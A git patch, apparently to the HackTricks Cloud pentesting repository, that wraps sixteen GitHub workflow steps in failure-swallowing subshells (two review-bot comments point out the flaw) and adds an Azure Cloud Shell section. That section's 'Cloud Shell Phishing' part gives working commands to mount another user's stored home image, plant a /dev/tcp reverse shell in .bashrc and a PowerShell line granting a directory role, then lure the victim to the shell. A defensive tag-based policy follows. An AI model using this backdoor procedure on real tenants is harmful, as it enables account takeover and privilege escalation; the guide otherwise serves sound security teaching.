From c6b3795cc59fcd4b2ad9b102d05ee36806a152a7 Mon Sep 17 00:00:00 2001
From: Carlos Polop
Date: Fri, 21 Feb 2025 14:55:41 +0100
Subject: [PATCH] fix workflows
---
 .github/workflows/build_master.yml | 4 +-
 .github/workflows/translate_de.yml | 4 +-
 .github/workflows/translate_el.yml | 4 +-
 .github/workflows/translate_es.yml | 4 +-
 .github/workflows/translate_fr.yml | 4 +-
 .github/workflows/translate_hi.yml | 4 +-
 .github/workflows/translate_it.yml | 4 +-
 .github/workflows/translate_ja.yml | 4 +-
 .github/workflows/translate_ko.yml | 4 +-
 .github/workflows/translate_pl.yml | 4 +-
 .github/workflows/translate_pt.yml | 4 +-
 .github/workflows/translate_sr.yml | 4 +-
 .github/workflows/translate_sw.yml | 4 +-
 .github/workflows/translate_tr.yml | 4 +-
 .github/workflows/translate_uk.yml | 4 +-
 .github/workflows/translate_zh.yml | 4 +-
 .../az-services/az-cloud-shell.md | 106 +++++++++++++++++-
 17 files changed, 133 insertions(+), 37 deletions(-)
diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml
index 6c3ba1592..19af7a94b 100644
--- a/.github/workflows/build_master.yml
+++ b/.github/workflows/build_master.yml
@@ -37,7 +37,7 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git config --global --add safe.directory /__w/hacktricks-cloud/hacktricks-cloud
+ (git config --global --add safe.directory /__w/hacktricks-cloud/hacktricks-cloud
 git pull
 git config --global user.email "build@example.com"
 git config --global user.name "Build master"
@@ -46,7 +46,7 @@ jobs:
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_de.yml b/.github/workflows/translate_de.yml
index f12fd4507..58ec2cef1 100644
--- a/.github/workflows/translate_de.yml
+++ b/.github/workflows/translate_de.yml
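Review bot: The `( … ) || echo "No changes to searchindex.js"` wrapper in the `Update searchindex.js in repo` step of build_master.yml hides every failure in the group, not only an empty commit. When a subshell is the left side of `||`, the shell ignores `-e` inside it, so a failed `git commit` no longer stops anything, `git push` still runs, and the echo fires only when the push itself fails (rejected, auth error) while the step is still reported as successful. Test for staged changes instead and let real errors fail the job: `git diff --cached --quiet || { git commit -m "Update searchindex"; git push; }`. The same wrapper is repeated in all fifteen translate_*.yml hunks of this patch.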
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_el.yml b/.github/workflows/translate_el.yml
index a274f6712..65e7ebaef 100644
--- a/.github/workflows/translate_el.yml
+++ b/.github/workflows/translate_el.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_es.yml b/.github/workflows/translate_es.yml
index 03e504912..c3690c9ca 100644
--- a/.github/workflows/translate_es.yml
+++ b/.github/workflows/translate_es.yml
@@ -67,13 +67,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_fr.yml b/.github/workflows/translate_fr.yml
index 79668a6a9..5c7aaee91 100644
--- a/.github/workflows/translate_fr.yml
+++ b/.github/workflows/translate_fr.yml
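Review bot: In the translate workflows the parenthesis opens before `git checkout $BRANCH`, so a failed checkout or `git pull` no longer aborts the step, because `-e` is suppressed inside a group whose status is tested by `||`. The remaining `cp`, `git add`, `git commit` and `git push` would then run against whatever branch the job already had checked out. Keep the branch switch outside the tolerant group and quote the variable: `git checkout "$BRANCH"` and `git pull` on their own lines before the opening parenthesis. Where `BRANCH` is set is not visible in this hunk, so whether it can be empty or unexpected should be confirmed; this applies equally to the other translate_*.yml hunks.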
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_hi.yml b/.github/workflows/translate_hi.yml
index 902bc2649..67b7a3253 100644
--- a/.github/workflows/translate_hi.yml
+++ b/.github/workflows/translate_hi.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_it.yml b/.github/workflows/translate_it.yml
index 8f349cf2b..e152b97b5 100644
--- a/.github/workflows/translate_it.yml
+++ b/.github/workflows/translate_it.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_ja.yml b/.github/workflows/translate_ja.yml
index afa0b53e1..ad12b954d 100644
--- a/.github/workflows/translate_ja.yml
+++ b/.github/workflows/translate_ja.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_ko.yml b/.github/workflows/translate_ko.yml
index b0105b388..5b894b9b0 100644
--- a/.github/workflows/translate_ko.yml
+++ b/.github/workflows/translate_ko.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_pl.yml b/.github/workflows/translate_pl.yml
index f6a07eb23..5a4e32d64 100644
--- a/.github/workflows/translate_pl.yml
+++ b/.github/workflows/translate_pl.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_pt.yml b/.github/workflows/translate_pt.yml
index 252c651f3..ef8bb2628 100644
--- a/.github/workflows/translate_pt.yml
+++ b/.github/workflows/translate_pt.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_sr.yml b/.github/workflows/translate_sr.yml
index a660db8fe..7d097e5d9 100644
--- a/.github/workflows/translate_sr.yml
+++ b/.github/workflows/translate_sr.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_sw.yml b/.github/workflows/translate_sw.yml
index e2761babc..b2338be82 100644
--- a/.github/workflows/translate_sw.yml
+++ b/.github/workflows/translate_sw.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_tr.yml b/.github/workflows/translate_tr.yml
index 5c3d9f1bc..05f54b3b3 100644
--- a/.github/workflows/translate_tr.yml
+++ b/.github/workflows/translate_tr.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_uk.yml b/.github/workflows/translate_uk.yml
index 8e373361f..7b1d0a4cc 100644
--- a/.github/workflows/translate_uk.yml
+++ b/.github/workflows/translate_uk.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_zh.yml b/.github/workflows/translate_zh.yml
index cbbfdef4e..0dc3240e0 100644
--- a/.github/workflows/translate_zh.yml
+++ b/.github/workflows/translate_zh.yml
@@ -68,13 +68,13 @@ jobs:
 - name: Update searchindex.js in repo
 run: |
- git checkout $BRANCH
+ (git checkout $BRANCH
 git pull
 cp book/searchindex.js searchindex.js
 cp book/searchindex.json searchindex.json
 git add searchindex.js searchindex.json
 git commit -m "Update searchindex for $BRANCH"
- git push
+ git push) || echo "No changes to searchindex.js"
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
index a23224e94..9977fa6d0 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
@@ -10,11 +10,107 @@ There aren't permissions assigned to this service, therefore the aren't privileg
 ### Key Features
-**Environment**:Azure Cloud Shell provides a secure environment by running on Azure Linux, Microsoft’s own Linux distribution designed for cloud infrastructure. All packages included in the Azure Linux repository are internally compiled by Microsoft to guard against supply chain attacks.
-**Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list".
-**$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account. Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends. To persist files across sessions, mount a storage account, which attaches automatically as **$HOME\clouddrive**, with your **$HOME** directory saved as an **.img** file in Azure File Share. However, files outside $HOME and machine states are not persisted. For securely storing secrets like SSH keys, use Azure Key Vault.
-**Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive.
-**Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs.
+- **Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list".
+- **Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive.
+- **Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs.
+- **$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account.
+ - Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends.
+ - To persist files across sessions, you are given the option to **mount a storage account**, which attaches automatically as `$HOME\clouddrive`, with your `$HOME` directory **saved as an .img file in a File Share.**
+
+### Cloud Shell Phishing
+
+If anattacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**.
+
+- **Download, backdoor and uplaod the image:**
+
+```bash
+# Download image
+mkdir /tmp/phishing_img
+az storage file download-batch -d /tmp/phishing_img --account-name
+
+# Mount image
+cd /tmp/phishing_img/.cloudconsole
+mkdir /tmp/cloudpoison
+sudo mount acc_username.img /tmp/cloudpoison
+cd /tmp/cloudpoison
+sudo mkdir .config
+sudo mkdir .config/PowerShell
+sudo touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
+sudo chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
+
+# Bash backdoor
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
+
+# PS backdoor
+echo "Connect-AzureAD; Add-AzureADDirectoryRoleMember -ObjectId 1246bcfd-42dc-4bb7-a86d-3637ca422b21 -RefObjectId 1D8B2447-8318-41E5-B365-CB7275862F8A" >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
+cd /tmp
+
+sudo umount /tmp/cloudpoison
+
+# Upload image
+az storage file upload --account-name --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img"
+```
+
+- **Then, phish the user to access https://shell.azure.com/**
+
+
+### Find & Forbid Cloud Shell Automatic Storage Accounts
+
+Storage accounts created by Cloud Shell are tagged with **`ms-resource-usage:azure-cloud-shell`**. It’s possible to create an Azure resource policy that disable creating resources with this tag.
+
+Find all the storage accounts created by Cloud Shell by tags:
+
+```bash
+az storage account list --output json | jq '.[] | select(.tags["ms-resource-usage"]=="azure-cloud-shell")'
+```
+
+Policy to forbid the creation of automatic storage accounts for cloud shell storage based on tags:
+
+```json
+{
+ displayName: "Restrict cloud shell storage account creation",
+ description: "Storage accounts that you create in Cloud Shell are tagged with ms-resource-usage:azure-cloud-shell.
If you want to disallow users from creating storage accounts in Cloud Shell, create an Azure resource policy for tags that is triggered by this specific tag. https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#restrict-resource-creation-with-an-azure-resource-policy",
+ metadata: {
+ category: "Storage",
+ version: "1.0.0"
+ },
+ mode: "All",
+ parameters: {
+ effect: {
+ type: "String",
+ metadata: {
+ displayName: "Effect",
+ description: "Deny, Audit or Disabled the execution of the Policy"
+ },
+ allowedValues: [
+ "Deny",
+ "Audit",
+ "Disabled"
+ ],
+ defaultValue: "Audit"
+ }
+ },
+ policyRule: {
+ if: {
+ allOf: [
+ {
+ field: "type",
+ equals: "Microsoft.Storage/storageAccounts"
+ },
+ {
+ field: "tags['ms-resource-usage']",
+ equals: "azure-cloud-shell"
+ }
+ ]
+ },
+ then: {
+ effect: "[parameters('effect')]"
+ }
+ }
+}
+```
+
+
 ## References